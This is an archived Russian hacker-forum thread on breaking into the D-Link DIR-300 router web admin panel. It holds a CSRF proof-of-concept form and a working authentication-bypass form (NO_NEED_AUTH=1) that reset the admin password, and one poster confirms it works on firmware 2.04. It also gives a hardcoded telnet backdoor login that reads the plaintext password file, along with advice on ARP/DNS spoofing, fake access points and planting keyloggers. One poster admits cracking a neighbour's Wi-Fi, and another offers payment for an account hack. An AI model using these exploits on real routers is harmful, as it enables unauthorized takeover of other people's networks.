Добро пожаловать! Это — архивная версия форумов на «Хакер.Ru». Она работает в режиме read-only.
 

Взлом пароля веб морды D-LINK dir-300

Пользователи, просматривающие топик: none

Зашли как: Guest
Все форумы >> [В Сети] >> Взлом пароля веб морды D-LINK dir-300
Имя
Сообщение << Старые топики   Новые топики >>
Взлом пароля веб морды D-LINK dir-300 - 2011-07-11 22:25:45.770000   
hgfss

Сообщений: 13
Оценки: 0
Присоединился: 2011-07-11 22:14:43.143333
Читал про уязвимость в dir-300,320,600
POST http://192.168.1.1:80/tools_admin.php HTTP/1.1
помогите реализовать
делал все как указано в статье http://nichtdozen.mybb2.ru/viewtopic.php?p=9086 ответ получил
"Only the admin account can change the settings."
прошивка роутера 2,05 Bx
помогите реализовать или подскажите как по другому попасть в веб интерфейс
Post #: 1
RE: Взлом пароля веб морды D-LINK dir-300 - 2011-09-16 00:29:00.886666   
vetieslav

Сообщений: 1
Оценки: 0
Присоединился: 2011-09-16 00:06:19.420000
В cmd или через putty (выбираешь тип подключения telnet)
telnet 192.168.1.1
login: Alphanetworks
password: wrgn23_dlwbr_dir300b
cd /var/etc
cat httpasswd
В результате видим логин/пароль веб-морды в открытом виде
Post #: 2
RE: Взлом пароля веб морды D-LINK dir-300 - 2011-09-16 06:56:09.810000   
zzsnn

Сообщений: 7459
Оценки: 680
Присоединился: 2007-09-25 07:17:14.240000
Обычно пароль у D-Link, если не меняли "admin" и пароль такой же, "admin".
Post #: 3
RE: Взлом пароля веб морды D-LINK dir-300 - 2011-10-06 01:54:19.740000   
hgfss

Сообщений: 13
Оценки: 0
Присоединился: 2011-07-11 22:14:43.143333
порт закрыт:@:@
Post #: 4
RE: Взлом пароля веб морды D-LINK dir-300 - 2011-10-27 22:39:23.690000   
SWG

Сообщений: 29
Оценки: 0
Присоединился: 2006-10-13 23:32:20.163333
D-Link DIR-300 CSRF Vuln (Change Admin Account Settings)
&lt;!-- [+] Title: D-Link DIR-300 CSRF Vuln. (Change Admin Account Settings) PoC Exploit [+] Desсriрtion: Enable Remote Menagement for specific IP [+] Firmware Version: 1.04 [+] Note: No need administrator to be logged (: [+] Author: outlaw.dll [+] Date: 17.12.2010 [+] Tested on: Windows 7 Ultimate (Google Chrome) but will work in any other OS This firmware version is full of CSRF and other type of vulnerabilities. W_o.O_W --&gt; &lt;form name="exploit" action="http://server/tools_admin.php?NO_NEED_AUTH=1&AUTH_GROUP=0" method="post"&gt; &lt;input type="hidden" name="ACTION_POST" value="1" /&gt; &lt;input type="hidden" name="admin_name" value="outlaw.dll" /&gt; &lt;input type="hidden" name="admin_password1" value="1337" /&gt; &lt;input type="hidden" name="admin_password2" value="1337" /&gt; &lt;input type="hidden" name="rt_enable_h" value="1" /&gt; &lt;input type="hidden" name="rt_port" value="8080" /&gt; &lt;input type="hidden" name="rt_ipaddr" value="192.168.0.1337" /&gt; &lt;/form&gt; &lt;sсriрt&gt;document.exploit.submit();&lt;/sсriрt&gt; Не помню, можно ли так посмотреть пароль админа, но пароль от WiFi узнать можно, проверялось на DIR-320:
http://192.168.0.1/bsc_lan.php?NO_NEED_AUTH=1&AUTH_GROUP=0
Post #: 5
RE: Взлом пароля веб морды D-LINK dir-300 - 2011-10-28 15:01:30.840000   
hgfss

Сообщений: 13
Оценки: 0
Присоединился: 2011-07-11 22:14:43.143333

quote:

ORIGINAL: SWG

D-Link DIR-300 CSRF Vuln (Change Admin Account Settings)
&lt;!-- [+] Title: D-Link DIR-300 CSRF Vuln. (Change Admin Account Settings) PoC Exploit [+] Desсriрtion: Enable Remote Menagement for specific IP [+] Firmware Version: 1.04 [+] Note: No need administrator to be logged (: [+] Author: outlaw.dll [+] Date: 17.12.2010 [+] Tested on: Windows 7 Ultimate (Google Chrome) but will work in any other OS This firmware version is full of CSRF and other type of vulnerabilities. W_o.O_W --&gt; &lt;form name="exploit" action="http://server/tools_admin.php?NO_NEED_AUTH=1&AUTH_GROUP=0" method="post"&gt; &lt;input type="hidden" name="ACTION_POST" value="1" /&gt; &lt;input type="hidden" name="admin_name" value="outlaw.dll" /&gt; &lt;input type="hidden" name="admin_password1" value="1337" /&gt; &lt;input type="hidden" name="admin_password2" value="1337" /&gt; &lt;input type="hidden" name="rt_enable_h" value="1" /&gt; &lt;input type="hidden" name="rt_port" value="8080" /&gt; &lt;input type="hidden" name="rt_ipaddr" value="192.168.0.1337" /&gt; &lt;/form&gt; &lt;sсriрt&gt;document.exploit.submit();&lt;/sсriрt&gt; Не помню, можно ли так посмотреть пароль админа, но пароль от WiFi узнать можно, проверялось на DIR-320:
http://192.168.0.1/bsc_lan.php?NO_NEED_AUTH=1&AUTH_GROUP=0

прошивка 2,05 Bx а не 1,04 - этот пост не пойдет, а пароль админа скрыт звездами
Post #: 6
RE: Взлом пароля веб морды D-LINK dir-300 - 2011-10-28 20:32:43.886666   
SWG

Сообщений: 29
Оценки: 0
Присоединился: 2006-10-13 23:32:20.163333
quote:

пароль админа скрыт звездами

* Попробуй посмотреть исходник страницы (на linksys wrt54gl dd-wrt такое получалось)
* Возможно у тебя получиться скопировать конфиг роутера используя уязвимость
http://192.168.0.1/bsc_lan.php?NO_NEED_AUTH=1&AUTH_GROUP=0 на базе нее построена и предыдущая уязвимость.
* Попробуй сниффером перехватить пароль, когда кто-то зайдет на роутер под аккаунтом админа.
Post #: 7
RE: Взлом пароля веб морды D-LINK dir-300 - 2011-10-28 20:50:03.670000   
hgfss

Сообщений: 13
Оценки: 0
Присоединился: 2011-07-11 22:14:43.143333

quote:

ORIGINAL: SWG

quote:

пароль админа скрыт звездами

* Попробуй посмотреть исходник страницы (на linksys wrt54gl dd-wrt такое получалось)
* Возможно у тебя получиться скопировать конфиг роутера используя уязвимость
http://192.168.0.1/bsc_lan.php?NO_NEED_AUTH=1&AUTH_GROUP=0 на базе нее построена и предыдущая уязвимость.
* Попробуй сниффером перехватить пароль, когда кто-то зайдет на роутер под аккаунтом админа.

исходник весь перерыл, ни чего интерестного там нет…
конфиг роутера тож не копируется(выкидывает на страницу типа–Only the admin account can change the settings)
под аккаунтом админа заходят с лана, а я по wi-fi подключаюсь т.е. пакеты я могу перехватить только wi-fi

Еще догадки…???
Post #: 8
RE: Взлом пароля веб морды D-LINK dir-300 - 2011-10-29 12:10:16.860000   
SWG

Сообщений: 29
Оценки: 0
Присоединился: 2006-10-13 23:32:20.163333
Теоретически ты можешь провести :
* ARP-spoofing атаку, чтобы перехватить трафик между роутером и клиентом.
* DNS-spoofing атаку, чтобы перенаправить жертву на свой фейковый WEB-интерфейс вместо какого-то сайта.
* Сделать так, чтобы зайшли на WEB-интерфейс по WiFi (положить WiFi сеть и ждать, когда зайдут по WiFi на WEB-интерфейс чтобы посмотреть в чем проблема или какие-то другие варианты)
А практически ты можешь :
* Взломать компьютер человека, который имеет админ-доступ к роутеру чтобы залить ему key-logger, покопаться в кешах браузеров на наличие пароля к роутеру или покопаться в ФС на наличие файла с паролем.
* Создать фейковую WiFi точку доступа с копией WEB-интерфейса роутера, переключить на нее всех WiFi пользователей и ждать, пока кто нибудь позовет админа роутера, чтобы посмотреть, почему у них не работает интернет.
—-
Вопрос : для какой цели тебе нужен пароль от роутера ?
—-
Возможно еще поможет программа : RouterPassView (for Win32) для просмотра пароля админа (лично ею не пользовался, не знаю как работает, читает ли она конфиг или с исходника достает)
Post #: 9
RE: Взлом пароля веб морды D-LINK dir-300 - 2011-11-01 02:33:08.426666   
m.ksy

Сообщений: 4
Оценки: 0
Присоединился: 2011-11-01 02:27:29.176666

quote:

ORIGINAL: hgfss

Читал про уязвимость в dir-300,320,600
POST http://192.168.1.1:80/tools_admin.php HTTP/1.1
помогите реализовать
делал все как указано в статье http://nichtdozen.mybb2.ru/viewtopic.php?p=9086 ответ получил
"Only the admin account can change the settings."
прошивка роутера 2,05 Bx
помогите реализовать или подскажите как по другому попасть в веб интерфейс

а можно подробнее о POST-запросе - я никаких запросов никогда не делал и не представляю, как это реализовать, может у меня получится 8|
Post #: 10
RE: Взлом пароля веб морды D-LINK dir-300 - 2011-11-01 02:42:48.743333   
m.ksy

Сообщений: 4
Оценки: 0
Присоединился: 2011-11-01 02:27:29.176666

quote:

ORIGINAL: SWG

—-
Вопрос : для какой цели тебе нужен пароль от роутера ?
—-

у меня, например, в целях узнать пароль, что бы сделать перенаправление портов, тоисть, что б используя внешний ІР(он статический) можно было в интернете зайти в настройки роутера, и используя ?NO_NEED_AUTH=1&AUTH_GROUP=0 можно было бы посмотреть пароль точки доступа.
Post #: 11
RE: Взлом пароля веб морды D-LINK dir-300 - 2011-11-02 00:47:22.860000   
m.ksy

Сообщений: 4
Оценки: 0
Присоединился: 2011-11-01 02:27:29.176666
все, понял как делать запросы, пароль поменялся с первой же попытки. правда написало "настройки не изменены", но все же пароль изменился :)
Post #: 12
RE: Взлом пароля веб морды D-LINK dir-300 - 2011-11-02 02:47:47.186666   
SWG

Сообщений: 29
Оценки: 0
Присоединился: 2006-10-13 23:32:20.163333
quote:

ORIGINAL: m.ksy
все, понял как делать запросы, пароль поменялся с первой же попытки. правда написало "настройки не изменены", но все же пароль изменился :)


Ну вот и отпишись :
* Модель роутера
* Версия ПО
* Пример запроса
Post #: 13
RE: Взлом пароля веб морды D-LINK dir-300 - 2011-11-02 11:51:47.950000   
m.ksy

Сообщений: 4
Оценки: 0
Присоединился: 2011-11-01 02:27:29.176666
DIR-300
1.04
&lt;form action="http://192.168.0.1:80/tools_admin.php" method="POST"&gt; &lt;input type="hidden" name="ACTION_POST" value="LOGIN"&gt; &lt;input type="hidden" name="LOGIN_USER" value="a"&gt; &lt;input type="hidden" name="LOGIN_PASSWD" value="b"&gt; &lt;input type="hidden" name="login" value="+Log+In+"&gt; &lt;input type="hidden" name="NO_NEED_AUTH" value="1"&gt; &lt;input type="hidden" name="AUTH_GROUP" value="0"&gt; &lt;input type="hidden" name="admin_name" value="admin"&gt; &lt;input type="hidden" name="admin_password1" value="admin"&gt; &lt;input type="submit"&gt; &lt;/form&gt;
Post #: 14
RE: Взлом пароля веб морды D-LINK dir-300 - 2011-11-04 00:27:59.080000   
hgfss

Сообщений: 13
Оценки: 0
Присоединился: 2011-07-11 22:14:43.143333
да, спасибо за советы…
ARP-spoofing атаку произвести можно, но насколько я знаю админ по вафле заходить не будет т.к. не имеет таковой…
DNS-spoofing атаку мороки много-опыта мало:((
пока не могу опробывать т.к. точка пропала, видать вырубили её…
а пароль был нужен для открытия портов на мой локал ип, и для изменения канала вафли
 
встал другой вопрос по поводу веб морды тока другого роутера- ZTE M-200 B
нужно достать пасс вебки
если не напряжно подскажи плиз
Post #: 15
RE: Взлом пароля веб морды D-LINK dir-300 - 2011-11-05 21:02:32.470000   
SWG

Сообщений: 29
Оценки: 0
Присоединился: 2006-10-13 23:32:20.163333

quote:

ORIGINAL: hgfss

да, спасибо за советы…
ARP-spoofing атаку произвести можно, но насколько я знаю админ по вафле заходить не будет т.к. не имеет таковой…
DNS-spoofing атаку мороки много-опыта мало:((
пока не могу опробывать т.к. точка пропала, видать вырубили её…
а пароль был нужен для открытия портов на мой локал ип, и для изменения канала вафли

встал другой вопрос по поводу веб морды тока другого роутера- ZTE M-200 B
нужно достать пасс вебки
если не напряжно подскажи плиз


Ты меня неправильно понял, читай :
http://forum.xakep.ru/m_2563141/tm.htm
Post #: 16
RE: Взлом пароля веб морды D-LINK dir-300 - 2011-11-08 14:27:27.526666   
strikazloids

Сообщений: 1
Оценки: 0
Присоединился: 2011-11-08 14:19:53.240000
Доброго всем дня в продолжение данной тему хотел бы спросить .проблема такая , есть модем D-link dir -400 версия по 1.00 , забыл на него пароль для доступа к веб интерфейсу . Доступ есть только с логина User . Как можно просмотреть пароль admin без сброса настроек модема . заранее спс . также вот исходный код страницы смены пароля <h1>ADMINISTRATOR SETTINGS</h1>

<p>There is password for this router by default. To help secure your network, we recommend that you should choose a new password.</p>

<br>

<input name="button" type="submit" class=button_submit value="Save Settings" onClick="return send_request()">

<input name="button" type=reset class=button_submit value="Don't Save Settings" onclick="page_cancel('form1', 'tools_admin.asp');">

</div>

<div class="box">

<h2>Administrator (The default Login Name is "admin") : </h2>

<table cellpadding="1" cellspacing="1" border="0" width="525">

<tr>

<td width="180" align="right">Login name :</td>

<td width="368"><font face=Arial size=2>  

<input type="text" id="admin_username" name="admin_username" size=20 maxlength=15 value="admin">

</font></td>

</tr>

<tr>

<td width="180" align="right">New Password :</td>

<input type="hidden" id="admin_password" name="admin_password" value="WDB8WvbXdHtZyM8Ms2RENgHlacJghQyG">

<td width="368"><font face=Arial size=2>  

<input type=password id="admin_password1" name="admin_password1" size=20 maxlength=15 value="WDB8WvbXdH" onChange="key_word(this,'admin_password');">

</font></td>

</tr>

<tr>

<td width="180" align="right">Confirm Password :</td>

<td width="368"><font face=Arial size=2>  

<input type=password id=admPass2 name=admPass2 size=20 maxlength=15 value="WDB8WvbXdH">

</font> </td>

</tr>

</table>

</div>

<div class="box">
Post #: 17
RE: Взлом пароля веб морды D-LINK dir-300 - 2011-11-09 10:14:21.326666   
eddiblatniakov666

Сообщений: 1
Оценки: 0
Присоединился: 2011-11-09 10:10:32.986666
такой вопрос взломал вай фай точку веп шифрования… соседа.. но вот беда пасс и логин на роутер не подходят стандартный …admin admin типо.. можно ли как либо их узнать.. мне надо для того чтобы порты расшаривать для прог!!
Post #: 18
RE: Взлом пароля веб морды D-LINK dir-300 - 2011-11-09 14:13:56.796666   
Trimox

Сообщений: 42
Оценки: 0
Присоединился: 2011-10-06 16:53:51.090000
Пойди и спроси у соседа ;)
Post #: 19
RE: Взлом пароля веб морды D-LINK dir-300 - 2011-11-13 00:16:23.723333   
Gosatch

Сообщений: 6
Оценки: 0
Присоединился: 2011-11-12 23:52:43.806666
Внимание! нужен срочно взлом аккаунта на usde.biz! вознаграждение гарантируется! писать в личку
Post #: 20
RE: Взлом пароля веб морды D-LINK dir-300 - 2011-12-06 14:12:15.790000   
toshyak

Сообщений: 2
Оценки: 0
Присоединился: 2011-12-06 13:34:55.006666
Тоже не очень понял про POST-запрос. Пытался и через консоль послать и через Putty. В консоли пишет "Connection closed by foreign host", а Putty закрывается через примерно минуту, даже не успеваю ничего толком отправить. Но я совсем не уверен, что все правильно делаю( На 80 порт надо открывать соединение или другой какой-то?

quote:

ORIGINAL: m.ksy

&lt;form action="http://192.168.0.1:80/tools_admin.php" method="POST"&gt; &lt;input type="hidden" name="ACTION_POST" value="LOGIN"&gt; &lt;input type="hidden" name="LOGIN_USER" value="a"&gt; &lt;input type="hidden" name="LOGIN_PASSWD" value="b"&gt; &lt;input type="hidden" name="login" value="+Log+In+"&gt; &lt;input type="hidden" name="NO_NEED_AUTH" value="1"&gt; &lt;input type="hidden" name="AUTH_GROUP" value="0"&gt; &lt;input type="hidden" name="admin_name" value="admin"&gt; &lt;input type="hidden" name="admin_password1" value="admin"&gt; &lt;input type="submit"&gt; &lt;/form&gt;


не понял, что c этим делать, как это отправлять и куда?
Post #: 21
RE: Взлом пароля веб морды D-LINK dir-300 - 2011-12-08 14:08:26.270000   
toshyak

Сообщений: 2
Оценки: 0
Присоединился: 2011-12-06 13:34:55.006666
Все, разобрался что делать, спасибо m.ksy

Просто создаете текстовый файлик с текстом запроса, сохраняете в html формате и открываете в браузере. Там будет одна кнопка, ее нажимаете и логин/пароль на роутере меняются на admin/admin
Post #: 22
RE: Взлом пароля веб морды D-LINK dir-300 - 2012-02-08 22:39:49.756666   
1C_ProgMan

Сообщений: 1
Оценки: 0
Присоединился: 2012-02-08 21:58:38.466666
парни, помогите решить проблему: забыл пароль на dir-300nru-b5 …
перепробовал все перечисленные здесь варианты - не получилось ничего((
пробовал RouterPassView (имеется бэкап настроек) - не помогла программка, она может прочитать только BIN файлы…
а новый dir-300nru сохраняет теперь в другом формате(
ресет - хотелось бы оставить как самый последний вариант, уж очень не хотса все перенастраивать(
Post #: 23
RE: Взлом пароля веб морды D-LINK dir-300 - 2012-04-09 00:19:05.030000   
ivo83

Сообщений: 1
Оценки: 0
Присоединился: 2012-04-09 00:14:53.660000
quote:

ORIGINAL: m.ksy

<form action="http://192.168.0.1:80/tools_admin.php" method="POST">
<input type="hidden" name="ACTION_POST" value="LOGIN">
<input type="hidden" name="LOGIN_USER" value="a">
<input type="hidden" name="LOGIN_PASSWD" value="b">
<input type="hidden" name="login" value="+Log+In+">
<input type="hidden" name="NO_NEED_AUTH" value="1">
<input type="hidden" name="AUTH_GROUP" value="0">
<input type="hidden" name="admin_name" value="admin">
<input type="hidden" name="admin_password1" value="admin">
<input type="submit">
</form>


на DIR-300 Hardware Version : B1 Firmware Version : 2.04 СРАБОТАЛО!
Post #: 24
Страниц:  [1]
Все форумы >> [В Сети] >> Взлом пароля веб морды D-LINK dir-300







Связаться:
Вопросы по сайту / xakep@glc.ru

Предупреждение: использование полученных знаний в противозаконных целях преследуется по закону.